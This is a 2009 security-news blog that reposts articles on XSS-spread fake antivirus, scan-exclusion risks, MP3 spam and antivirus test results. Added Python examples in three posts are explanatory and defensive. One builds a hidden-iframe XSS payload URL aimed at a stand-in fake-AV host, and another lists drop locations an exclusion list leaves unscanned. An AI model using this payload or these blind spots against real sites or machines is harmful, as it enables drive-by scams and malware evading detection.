Tuesday, December 29, 2009

XSS Attacks Pushing Fake Antivirus - Friendly Computers

According to the security researchers at Zscaler (a cloud security company), malware distributors are exploiting security flaws in news.com.au, lawyer.com, appleinsider.com and many other legitimate websites to thrust fake antivirus software on unwitting computer users. - Friendly Computers

Read more below…

Zscaler states that the attacks currently spreading are worth noting because they exploit cross-site scripting (XSS) flaws to conceal malicious links inside the URLs of reputable websites. Consequently, people who believe they are visiting a website they know and trust land instead on a page designed to make them think that their PCs are infected with malware.

Mike Geide, Senior Security Researcher at Zscaler, said that the interesting thing about the attacks was that they used embedded iframes to divert people elsewhere, as reported by The Register on December 16, 2009.
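The mechanism described above, as an added example that is not part of the original report or of any site named in it: a search page that reflects a query parameter into its HTML unescaped, the crafted URL an attacker would circulate (trusted hostname, percent-encoded iframe payload in the query string), and the same page with output encoding applied at the sink. The template, the parameter name `q`, and the hostnames `news.example` and `fakeav.example` are assumptions.

```python
"""Reflected XSS carrying a hidden iframe, beside the output-encoding fix.

Added example; not code from Zscaler or from any website named above.
The page template, parameter name 'q' and both hostnames are assumptions.
"""
import html
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical page template: the search term is reflected into the HTML.
TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def render_vulnerable(term: str) -> str:
    """Reflects the user-supplied term verbatim: a reflected XSS flaw."""
    return TEMPLATE.format(term=term)


def render_fixed(term: str) -> str:
    """Same page with HTML entity encoding applied at the output sink,
    so '<', '>', '&' and quotes can no longer open a tag or attribute."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def build_attack_url(trusted_site: str, attacker_host: str) -> str:
    """Builds the kind of link the text describes: the hostname belongs to
    the trusted site, while an invisible iframe pointing at the fake-AV
    host rides in the query string, percent-encoded so it reads as noise."""
    payload = (f'<iframe src="http://{attacker_host}/scan" '
               f'width="0" height="0"></iframe>')
    return f"http://{trusted_site}/search?q={quote(payload, safe='')}"


def term_from_url(url: str) -> str:
    """What the server sees after decoding the query string."""
    return parse_qs(urlsplit(url).query)["q"][0]


def page_has_injected_iframe(page: str, attacker_host: str) -> bool:
    """Crude check on a rendered page: is there a live iframe whose
    source is the attacker's host rather than the page's own?"""
    return f'<iframe src="http://{attacker_host}' in page


if __name__ == "__main__":
    url = build_attack_url("news.example", "fakeav.example")
    term = term_from_url(url)
    print(url)
    print("vulnerable page carries iframe:",
          page_has_injected_iframe(render_vulnerable(term), "fakeav.example"))
    print("fixed page carries iframe:",
          page_has_injected_iframe(render_fixed(term), "fakeav.example"))
```

The fix is applied where untrusted data meets HTML, not on the way in; a filter on the URL alone would miss alternative encodings, whereas entity-encoding at the sink neutralises whatever survives decoding.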

It is still not known which individual or group is responsible for the XSS attacks. The motive, however, is not difficult to understand: exploit people's trust in a familiar website so that the fake antivirus software is loaded onto as many computers as possible.

Moreover, these distributors also exploit the large time gap between the moment malicious software lands on users' computers and the moment AV firms ship detection that blocks it.

As earlier research into fake AV has indicated, the cybercriminals who push these programs make huge sums of money every month.

Further, hijacking legitimate websites to distribute fake antivirus is nothing new. Earlier this year (2009), criminals hijacked the New York Times website for the same purpose, and soon afterwards the Gizmodo site as well.

In fact, security companies describe FAKEAV as a rising hidden threat that has escalated sharply over recent years. PandaLabs substantiated this with its detection of 374,000 FAKEAV samples during Q2 2009, and McAfee has reported a similar trend.

The threat of fake antivirus therefore needs to be tackled urgently.


Source: http://www.spamfighter.com/News-13664-XSS-Attacks-Pushing-Fake-Antivirus.htm

Monday, December 28, 2009

You Don't Need to Regularly Reinstall Windows; Here's Why - Friendly Computers

One of the most persistent myths about Windows is that you need to reinstall the operating system regularly to keep it running at top performance. Let's take a look at the real problem and how to fix it. - Friendly Computers

Read more below…
Today we're talking about the myth that Windows slows down over time, and how to solve the problem. The reality is that Windows doesn't slow down if you just take care of your PC a little more. Follow these procedures, and you won't have to wonder if spending hours backing up data, installing from disc, and re-installing your essential applications is really necessary.

What Does Slow Windows Down Over Time?
I'm not going to sit here and tell you that your Windows PC will never slow down, because for many people it almost always does. What actually slows your PC down is too many poorly written applications that stay resident in memory and waste CPU cycles, too many badly written low-level applications that hook into Windows, or running more than one antivirus application at a time. And of course, if you've run your PC's hard drive out of space, you can hardly blame Windows for that.

If you aren't getting the picture, the problem is usually the person behind the keyboard that installed too many junk applications in the first place. More gently put, it's often that (very well-meaning) person's gradual easing of their safeguards and cleaning regimens as time goes by.

Stop Installing Junk Applications
Installing software should be thought of like feeding your PC. If you constantly feed your PC garbage apps, it's going to get sick and won't be able to run fast anymore. These poorly written applications clutter your drive with unnecessary DLL files, add always-resident Windows services when they don't need to, bloat up your registry, and add useless icons to your system tray that waste even more memory and CPU cycles. Usually you can get away with using a few terrible applications, but as you continue to install more and more of them, your PC will slow down to a crawl.

Be Smarter About What You Do Install
We feature and recommend a lot of software applications around here, but keep in mind that we aren't telling you to install every single one of them at the same time. Just install the applications that you actually need and you'll generally avoid the dreaded format and reinstall.

Here are a few tips on which applications you should be careful with:

Apps that function as an Explorer plug-in, because they hook directly into the shell, and any problem with them will make your entire PC slow or, in the worst case, crash repeatedly.
Antivirus applications are notorious for slowing your PC down, and you should never, ever, ever use more than one real-time antivirus application at a time. We recommend Microsoft Security Essentials as a free, fast, and awesome antivirus tool.
Anything that says it will "Speed Up Your PC" or "Optimize Your RAM" will most likely slow it down or, at best, do nothing at all. Avoid these like the plague.
Make sure to install official system drivers from the manufacturer's website. Drivers have a huge impact on performance, and you want stable, up-to-date drivers.
Registry cleaners are a mixed bag, and really aren't going to speed up your PC in most cases. The bigger problem is that too many commercial registry cleaners set themselves to run at startup in the system tray, wasting memory and CPU cycles.
You should strongly consider using portable applications wherever possible, since their self-contained nature means they won't clutter up the rest of your PC with things you don't need.

Keep Your Computer Clean and Trim
Once you've rid yourself of your junk application habit and resolved to only use healthy, useful applications, you'll want to make sure to keep your PC clean of any remaining clutter that doesn't need to be there. You can set up a shortcut to manually run CCleaner silently with the push of a button, but your best bet is to set up CCleaner to run automatically on a schedule, so you don't have to remember to do it.

Since CCleaner only cleans up temporary files, you'll still need a good solution for keeping the rest of your PC clean, and Lifehacker's own Belvedere can help you automate your self-cleaning PC or automatically clean up your download folder.

With all of this automated file deletion going on, your hard drive is likely to get a bit fragmented. If you're already running Windows 7 or Vista, automatic defrag comes out of the box and probably shouldn't be messed with, but Windows XP users will need to use Scheduled Tasks to set up a schedule and automatically defrag their drives.

Use a Virtual Machine or Sandbox to Test Software
If you still want to test out all of the latest software, including apps that look a bit rough around the edges, your best bet is to use a virtual machine to test anything before putting it onto your primary operating system. You can install all of your software in an XP or Windows 7 VM just as on a real PC, and with the latest VMware Player releases you can even enable Windows Aero in a guest VM. If you are new to the idea and need more help, check out our beginner's guide to creating virtual machines in VirtualBox, or, for Windows 7 users, our guide to using XP Mode. If you don't want to go the virtual machine route, Windows XP and Vista users can alternatively use Windows SteadyState to protect their PC and roll back all changes on reboot.


Source: http://lifehacker.com/5435523/you-dont-need-to-regularly-reinstall-windows-heres-why

Wednesday, December 23, 2009

The new look of Mobile security - Friendly Computers

BURLINGAME, USA: Our phones are becoming more like computers with every passing day. The good news is that we can take our data anywhere and work wherever we'd like. The bad news is that our phones are becoming more vulnerable to spyware, viruses and other attacks. - Friendly Computers
Read more below…
A start-up called Lookout is trying to make phones safer and views itself as the "Symantec or McAfee of the mobile space." In 2010, the company will offer software that can scan phones to determine which apps are safe and which are not. "Applying PC solutions to a mobile problem just won't work," says Lookout Chief Executive John Haring.

Here's how Lookout's technology works: You download the software, sign up for an account and configure the options you want to enable. The software offers anti-virus, data backup and device location. Then, when you download a new app from, say, the Android Marketplace, Lookout's software automatically scans the app and alerts you to take action if an app contains spyware or other malware.

"As marketplaces become more open, and a guy from Romania is next to Google, it becomes hard to tell what's good and what's not," says Lookout Chief Technologist Kevin Mahaffey. "We see a tremendous need for someone to pass an opinion."

Lookout's technology works on Microsoft's Windows Mobile, Google's Android, Apple's iPhone and Research In Motion's BlackBerry platforms.

Haring says Lookout will release all of the applications in 2010, and begin development for the Symbian platform, the world's most popular mobile operating system. For now the software is free to use, and Lookout plans to introduce premium features and subscription accounts later next year.



Source: http://www.ciol.com/Technology/Security/Feature/The-new-look-of-Mobile-security/231209129273/0/

Tuesday, December 22, 2009

Facebook Trojan: Brazen, but (Luckily) Benign - Friendly Computers

Third-party application called "Phutos" was able to mimic Facebook's native functionality. - Friendly Computers

Read more below…
This past weekend, a Trojan mimicked Facebook's native functionality and sent notifications on the user's behalf. While Facebook says that the application was harmless, its ability to break through a boundary of trust on the platform alarmed me.

The Trojan came to my attention on Saturday after I received several Facebook notifications (in the form of a red number in the bottom right of the page) telling me that friends had commented on my photos. It was the same notification that I receive on a day-to-day basis.

When I clicked on the notification, it attempted to load an application called "Phutos," which wanted access to my personal information and social network. I declined. A few minutes later, another notification appeared, but I was not taken to the application screen after I clicked on it. That seemed fishy, so I decided to review my applications.

"Phutos" was under my list of recently used applications, even though I never authorized its installation. At that point, I uninstalled the application and notified Facebook of my findings. Obviously, I also had some questions for it.

Facebook spokesperson Simon Axton stayed in steady contact with me over the weekend, and informed me on Monday that the company had disabled the application because it violated Facebook's Developer Principles and Policies. Facebook had determined that the application did not contain any malware, and has a dedicated enforcement team that investigates reports about suspicious applications, he told me.

When I asked what else Facebook does to protect its users, Axton said "We rely on reports from users for suspicious applications. Our team also conducts spot reviews of top applications and of many other applications, including looking at the data they need to run the application versus the data they gather. When we find a violation, we take action to enforce our policies."

It's great that Facebook says it's taking its users' safety seriously, but I am taken aback by how easily a third-party application could mimic Facebook's default Web applications. Users can now specify what information applications may access, but everyone uses Facebook differently, so there is a bounty of information for malware to exploit.

There should be a wall between the Facebook development platform and the applications that make up the site itself.

Source: http://www.pcworld.com/article/185274/facebook_trojan_brazen_but_luckily_benign.html

Monday, December 21, 2009

Microsoft Virus Scanning Recommendations Bring Risks - Friendly Computers

We have recently received queries from customers about the official exclusion list recommendations from Microsoft. It seems that Microsoft has published a Knowledge Base entry that lists recommendations for improving Windows performance when running antivirus scanners. - Friendly Computers
Read more below…

This list recommends that customers exclude certain extensions and folders from antivirus scanning. Now, although it does make sense to stop checking Windows Update and some Group Policy-related files if you really want to speed up the system, we are concerned that the list was released publicly.

This is an overview of these recommendations from Microsoft:

Certain files in the SoftwareDistribution folder.
Certain specific file names (for example, edb.chk).
A short list of extensions within specific folders (for example, *.log).
Plus some similar lists for Group Policy files.

Following the recommendations does not pose a significant threat at present, but it has great potential to become one. Cybercriminals may strategically drop or download a malicious file into one of the folders that are recommended for exclusion from scanning, or give it a file extension that is also on the excluded list.
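The risk above, made concrete as an added example (not code from Microsoft or Trend Micro): a matcher that evaluates candidate drop locations against an exclusion list of the three shapes the Knowledge Base entry uses (a whole folder, a named file, an extension within a folder) and reports which locations a scanner configured that way would never inspect. The rule set and paths are illustrative assumptions, not Microsoft's actual list.

```python
"""Why a scan-exclusion list is an attacker opportunity.

Added example; not Microsoft's or Trend Micro's code. The rules below are
illustrative only, in the three shapes the KB list uses (a folder, a named
file, an extension within a folder); the exact paths are assumptions.
"""
from pathlib import PureWindowsPath
from typing import Dict, Iterable, Optional

# Hypothetical exclusion rules, in the shapes the text describes.
EXCLUDED_FOLDERS = [r"C:\Windows\SoftwareDistribution\Download"]
EXCLUDED_FILES = [r"C:\Windows\SoftwareDistribution\Datastore\Logs\edb.chk"]
EXCLUDED_EXT_IN_FOLDER = [
    (r"C:\Windows\SoftwareDistribution\Datastore\Logs", ".log"),
]


def _under(path: PureWindowsPath, folder: str) -> bool:
    """True if path is the folder itself or lies anywhere beneath it.
    PureWindowsPath compares case-insensitively, as NTFS does, so
    'c:\\WINDOWS\\...' and 'C:\\Windows\\...' match."""
    f = PureWindowsPath(folder)
    return path == f or f in path.parents


def excluded_by(path_str: str) -> Optional[str]:
    """Returns a description of the rule that would keep the file unscanned,
    or None if a scanner configured this way would still inspect it."""
    p = PureWindowsPath(path_str)
    for f in EXCLUDED_FILES:
        if p == PureWindowsPath(f):
            return f"named file {f}"
    for folder in EXCLUDED_FOLDERS:
        if _under(p, folder):
            return f"folder {folder}"
    for folder, ext in EXCLUDED_EXT_IN_FOLDER:
        if _under(p, folder) and p.suffix.lower() == ext:
            return f"*{ext} under {folder}"
    return None


def audit_drop_points(candidates: Iterable[str]) -> Dict[str, Optional[str]]:
    """Maps each candidate drop location to the rule that hides it (or None).
    Shows which of an attacker's options the exclusions would cover."""
    return {c: excluded_by(c) for c in candidates}


if __name__ == "__main__":
    # Constructed drop locations an attacker might choose.
    report = audit_drop_points([
        r"C:\Windows\SoftwareDistribution\Download\payload.exe",
        r"C:\Windows\SoftwareDistribution\Datastore\Logs\payload.LOG",
        r"C:\Windows\SoftwareDistribution\Datastore\Logs\payload.exe",
        r"C:\Users\Public\payload.exe",
    ])
    for path, rule in report.items():
        print(f"{path}: {'UNSCANNED via ' + rule if rule else 'scanned'}")
```

Two of the four constructed locations come back unscanned: anything under the excluded folder, and a payload renamed with the excluded extension in the excluded log folder. A practitioner reviewing an exclusion list can run exactly this kind of check against the locations a dropper is able to write to before accepting a rule.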

We find it sensible for users to aim for better system performance. However, we also think that excluding certain file types or folders from antivirus scanning is not something novice users should tinker with. Doing so may expose the system to risks that can lead to an inconvenience far more severe than a slightly slower system.

In line with this, we advise users to educate themselves fully about these recommendations before taking any actions. We recommend users not to exclude any file, unless there is a critical reason to do so, and be aware of the risks entailed by such an action.


Source: http://blog.trendmicro.com/microsoft-virus-scanning-recommendations-bring-risks/

Friday, December 18, 2009

MP3 Spam Is Back! - Friendly Computers

Old trends never die; they just resurface from time to time. - Friendly Computers
Read more below…

Case in point: spammed messages with attached MP3 files, last seen two years ago, made their presence felt once again today.

Trend Micro researchers were alerted to spammed messages with no subject and no body content. Each message contained only an MP3 file; when played, it delivers a voice advertising Viagra and other sexual-enhancement pills. The voice also urges users to visit a URL that points to the all-too-familiar Canadian pharmacy sites.
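The three characteristics above (no subject, no body text, a lone MP3 attachment) are enough for a simple mail-filter rule. The following is an added example, not Trend Micro's detection logic: it constructs sample messages with the standard library, then runs a detector over them. The addresses, the attachment name and the "MP3" bytes are constructed placeholders.

```python
"""Flags the spam pattern described above: no subject, no body text, and a
single MP3 attachment. Added example with constructed messages; this is
not Trend Micro's detection logic. The 'MP3' bytes are a placeholder."""
import email
from email import policy
from email.message import EmailMessage

# Placeholder payload: an ID3-style header followed by zeros, not real audio.
FAKE_MP3 = b"ID3\x03\x00\x00\x00\x00\x00\x00" + b"\x00" * 32


def build_sample(subject: str, body_text: str, attach_mp3: bool) -> bytes:
    """Constructs a raw RFC 5322 message for exercising the detector.
    An empty subject means the header is omitted, as in the spam run."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    if subject:
        msg["Subject"] = subject
    msg.set_content(body_text)
    if attach_mp3:
        msg.add_attachment(FAKE_MP3, maintype="audio", subtype="mpeg",
                           filename="listen.mp3")
    return msg.as_bytes()


def is_mp3_spam(raw: bytes) -> bool:
    """True when the message matches the pattern: empty subject, empty
    body, and exactly one attachment that is (or claims to be) an MP3."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg["Subject"] or "").strip()
    body = msg.get_body(preferencelist=("plain", "html"))
    body_text = body.get_content().strip() if body is not None else ""
    attachments = list(msg.iter_attachments())
    mp3s = [a for a in attachments
            if a.get_content_type() == "audio/mpeg"
            or (a.get_filename() or "").lower().endswith(".mp3")]
    return (subject == "" and body_text == ""
            and len(attachments) == 1 and len(mp3s) == 1)


if __name__ == "__main__":
    print("spam run sample:", is_mp3_spam(build_sample("", "", True)))
    print("ordinary mail  :", is_mp3_spam(build_sample("Demo", "see attached", True)))
```

The check looks at the declared content type and at the file name, since either may be the only clue; a real filter would also weigh sender reputation, because a legitimate correspondent does occasionally send a bare attachment.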

In the past, Trend Micro has blogged about how cybercriminals used MP3 files, or files purporting to be MP3s, in their malicious activities, in the following posts:

Storm Pump-and-Dump: The Musical
Music Unleashes the Malware Beast

Users are strongly advised not to open or run attached files from unknown senders. Trend Micro secures users from this attack via its Smart Protection Network, which blocks the spammed messages.


Source: http://blog.trendmicro.com/mp3-spam-is-back/

Thursday, December 17, 2009

AV-Test.Org Releases Real-World Malware Protection Report - Friendly Computers

Magdeburg-based research lab AV-Test.org today released the results of a lengthy real-world malware protection study. This test challenged a dozen major security suites to protect Internet-connected physical computers against up-to-the-minute threats. Each day for 60 days, researchers released 10 fresh threats on the test systems and analyzed each product's ability to detect the threat and to fully block its installation. They also checked for false alarms--valid programs reported as malware. All of the suites did a decent job, though some were significantly better than others. - Friendly Computers

Read more below…

The report notes that modern security suites include many layers of protection, including "URL filtering, web reputation services, exploit blocking, 'in-the-cloud' scanning as well as behavior-based protection mechanisms." A test that only challenges the product's on-demand scanner is not representative of real-world performance. The current test simply evaluated whether the product detected each malware sample, without regard for which security component handled the detection. Afterward, the team used in-house analysis software to determine whether the malware attack was successfully blocked.

This kind of dynamic testing is much more labor intensive than simply running a static collection of malware past an on-demand scanner. An automated static file test can process millions of samples without human intervention. By contrast, tracking the 600 malware samples and 400 clean files took all of AV-Test's resources. "Our entire lab with 14 full-time employees and up to 150 PCs and server systems were involved in this project."

Norton Internet Security 2010 scored highest at malware detection, at 98.0 percent. Even the least successful of the twelve, Trend Micro Internet Security 2010, detected 83.3 percent. Of course, detecting a threat doesn't always mean successfully preventing the attack. The top scorer for actual malware blocking was PC Tools Internet Security 2010, at 94.8 percent. CA Internet Security 2010 brought up the rear with 73.5 percent. Here are the full results:

MALWARE DETECTION RATES AND WARNING MESSAGES (FALSE ALARMS)

Tested Product                            Malware Detected   False Alarms
Symantec Norton Internet Security 2010    98.0%              almost none
Kaspersky Internet Security 2010          97.5%              few
PC Tools Internet Security 2010           95.8%              almost none
AVG Internet Security 9.0                 92.2%              few
G Data Internet Security 2010             90.0%              many
Panda Internet Security 2010              90.0%              almost none
Avira Premium Security Suite 9.0          87.7%              many
McAfee Internet Security 2010             87.2%              few
CA Internet Security 2010                 86.7%              few
F-Secure Internet Security 2010           85.8%              almost none
BitDefender Internet Security 2010        84.3%              few
Trend Micro Internet Security 2010        83.3%              few

MALWARE BLOCKING RATES AND WARNING MESSAGES (FALSE ALARMS)

Tested Product                            Malware Blocked    False Alarms
PC Tools Internet Security 2010           94.8%              none
Symantec Norton Internet Security 2010    92.8%              none
Kaspersky Internet Security 2010          89.8%              few
Panda Internet Security 2010              88.7%              none
Avira Premium Security Suite 9.0          87.2%              none
McAfee Internet Security 2010             86.7%              none
AVG Internet Security 9.0                 84.2%              few
G Data Internet Security 2010             83.0%              few
Trend Micro Internet Security 2010        81.3%              few
F-Secure Internet Security 2010           80.2%              none
BitDefender Internet Security 2010        77.8%              none
CA Internet Security 2010                 73.5%              none

This kind of dynamic testing is the wave of the future. It's hard to do, but it's the only way to really evaluate a product's ability to protect against malware.


Source: http://blogs.pcmag.com/securitywatch/2009/12/av-testorg_releases_real-world.php#more

Wednesday, December 16, 2009

Scammers exploit Google Doodle to spread malware - Friendly Computers

Online scammers are taking advantage of the public's interest in the Google Doodle to spread malware, a security firm warned on Tuesday - Friendly Computers
Read more below…

In so-called "SEO poisoning," scammers use search engine optimization techniques to increase the distribution of malware. They create special malware-rigged Web sites or hide malware on legitimate Web sites they've compromised and then use tags associated with popular search terms to get them listed high up in search engine results.

Typically, scammers capitalize on public interest in news events or celebrities, targeting searches like "Swine Flu" or "Michael Jackson death." But in the latest twist on this technique, scammers are exploiting interest in the Google Doodle, the graphics that often take over the Google logo on holidays or to mark special events.

For instance, the doodle on Tuesday showed a flag for Esperanto, a universal language created by L.L. Zamenhof which is based on parts from a variety of languages. Clicking on the doodle, located near the search box, brings up a list of search terms for "L.L. Zamenhof."

Dave Michmerhuizen, a research scientist at Barracuda Networks, found 31 poisoned sites among the first 100 results, 27 of them in the first 50 sites alone.

On the first results page was a link leading to a compromised Web site that redirects visitors to a fake antivirus site, according to Michmerhuizen. That site displays a fake alert saying the computer might be infected and does a fake scan before prompting the user to pay for antivirus software, he said.

A Google spokesperson said the company had already removed many of the allegedly malicious sites from its index, using manual and automated processes to enforce its policies.

"As you probably know, the use of popular search terms to target malware is neither a new vector nor unique to any particular search engine. We work hard to protect our users from malware, and using any Google product to serve malware is a violation of our product policies," the spokesperson said in an e-mail.

"Our Safe Browsing technology is capable of detecting malware being served from sites that have been compromised," the Google e-mail said. "In fact, as we've explained publicly, we have been seeing more infections coming from compromised sites" across the entire Web.


Source: http://news.cnet.com/8301-27080_3-10416246-245.html?tag=mncol

Tuesday, December 15, 2009

Rating the best anti-malware solutions - Friendly Computers

AV-Comparatives' December 2009 report has been released and there are eight winners. The other eight products didn't do so well. - Friendly Computers
Read more below…

Following its November 2009 retrospective/proactive report, AV-Comparatives has released its December 2009 Potentially Unwanted Applications (PUA) comparative. PUA refers to adware, spyware, rogue, and other fraudulent software circulating on the Internet that are not typical malware (classification in the last category is sometimes not an easy task; under some circumstances, PUAs are accepted in some countries, depending on the cultural background or the legal system, and hence the term "potentially unwanted"). AV-Comparatives typically do not include PUAs in their malware test sets, but since users may want to know how well their antivirus program detects potentially unwanted software, a separate test was created.

The first PUA test contained 750,297 individual samples (program executables only) covering mainly adware, spyware, and rogue software gathered between January 2009 and October 2009 (the sets were frozen on October 29, 2009). Dialers, potentially dangerous tools, and other greyware were not included, as their classification is debatable, and not all security products include detection for them, since doing so sometimes conflicts with company policy. Sixteen products were updated on November 6, 2009, set to their highest detection settings (except for Sophos and F-Secure, at their own request), and put to the test.

Here are the results of this particular test:

1. G DATA Antivirus 2010: 99.8 percent
2. Trustport Antivirus 2010: 99.8 percent
3. AVIRA AntiVir Premium 9.0: 98.9 percent
4. McAfee VirusScan Plus 2010: 98.9 percent
5. BitDefender Antivirus 2010: 98.6 percent
6. eScan AntiVirus 10.0: 98.6 percent
7. F-Secure Anti-Virus 2010: 98.6 percent
8. Symantec Norton Antivirus 2010: 98.6 percent
9. Kaspersky Anti-Virus 2010: 96.7 percent
10. ESET NOD32 Antivirus 4.0: 96.5 percent
11. avast! Free 5.0: 96.3 percent
12. Sophos Antivirus 9.0.1: 95.4 percent
13. Microsoft Security Essentials 1.0: 94.6 percent
14. AVG Anti-Virus 9.0: 93.9 percent
15. Norman Antivirus & Anti-Spyware 7.30: 88.5 percent
16. Kingsoft AntiVirus 9 Plus: 87.1 percent

Chart: Missed Samples in Percentage Points (AV-Comparatives)

The numbered list above gives the detection rates in percent for adware, spyware, and rogues, while the chart shows the number of missed samples in percentage points. After taking these results into consideration, AV-Comparatives rated the products from best to worst in three categories:

•Advanced+: TrustPort, G DATA, McAfee, AVIRA, Symantec, F-Secure, BitDefender, eScan
•Advanced: Kaspersky, ESET, Avast, Sophos, Microsoft, AVG
•Standard: Norman, Kingsoft
The results seem to suggest that the best antivirus applications that regularly rank highly in general malware tests are not necessarily as good at anti-adware, antispyware, and antirogue detection. That said, all 16 products detected at least 85 percent of the threats, which is respectable. Overall, we can say that the detection rate of PUAs is similar to the detection rate of general malware.

It's worth noting that this is the first AV-Comparatives test in which Microsoft Security Essentials (MSE), Redmond's free antimalware solution, was tested in its final 1.0 form. MSE was released in September 2009 and these tests were performed last month. Clearly Microsoft has work to do, at least in the PUA department (the beta version did quite well in older antimalware tests).